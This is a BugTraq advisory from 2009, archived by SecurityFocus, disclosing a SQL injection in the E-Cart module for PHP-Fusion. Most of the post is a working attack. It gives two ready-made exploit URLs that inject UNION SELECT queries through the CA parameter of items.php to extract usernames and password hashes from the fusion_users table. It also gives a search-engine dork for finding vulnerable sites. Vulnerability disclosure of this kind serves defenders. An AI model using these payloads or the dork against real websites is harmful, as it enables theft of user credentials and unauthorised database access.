BugTraq
PHP-Fusion Mod E-Cart Sql Injection Jan 07 2009 11:53AM
r3d w0rm yahoo com
########################################################################
#############
#### PHP-Fusion Mod E-Cart Sql Injection ####
########################################################################
#############
# #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi
########################################################################
#############
# #
#Download : http://www.phpfusion-mods.net/infusions/downloads/dldb.php?op=view&id=28
1
# #
#Dork : inurl:/infusions/e_cart #
# #
########################################################################
#############
# [Bug] #
# #
#Username : http://Site/[path]/infusions/e_cart/items.php?CA=-9999'%20union%20select
%20user_name,1,2%20from%20fusion_users/*
# #
#Password : http://Site/[path]/infusions/e_cart/items.php?CA=-9999'%20union%20select
%20user_password,1,2%20from%20fusion_users/*
# #
########################################################################
#############
# Site : Http://IRCRASH.COM #
###################################### TNX GOD ######################################

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus